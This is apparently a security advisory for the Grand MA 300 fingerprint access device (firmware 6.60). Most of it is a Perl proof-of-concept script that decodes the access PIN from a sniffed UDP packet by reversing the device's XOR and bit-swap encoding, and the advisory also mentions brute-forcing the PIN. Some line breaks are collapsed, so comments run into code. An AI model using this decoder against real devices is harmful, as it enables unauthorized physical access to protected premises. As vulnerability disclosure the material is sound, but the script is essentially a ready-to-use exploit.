source: https://www.securityfocus.com/bid/69390/info
Grand MA 300 is prone to multiple security weaknesses.
Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
Grand MA 300 running firmware version 6.60 is vulnerable.#!/usr/bin/perl## This script calculates the original pin based on the pin# retrieved on the wire for the Grand MA 300 fingerprint access device## look for a UDP packet starting with 0x4E 0x04, the last 4 bytes are the# encoded pin## written by Eric Sesterhenn <eric.sesterhenn () lsexperts de># http://www.lsexperts.de#
use warnings;
use strict;
my $cid = 0;# connection id
my $ret = 0x4B00A987;# pin on the wire# get gettickcount value (third byte)
my $gc = ($ret >> 16) & 0xFF;# set third byte to magic value (so it becomes zero when we xor it later with the magic value)$ret =$ret| 0x005A0000;# xor all, but third byte with last byte of gettickcount$ret ^= $gc+($gc << 8)+($gc << 24);# switch the words$ret = (($ret & 0xFFFF) << 16)+($ret >> 16);# xor with magic value$ret ^= 0x4F534B5A;# substract the connection id$ret-=$cid;
my $fin = 0;# revert the bitsfor(my $i = 0;$i < 32;$i++){$fin*= 2;if($ret & 1){$fin = $fin+ 1;}$ret = $ret/ 2;}
printf("final: %X \n",$fin);
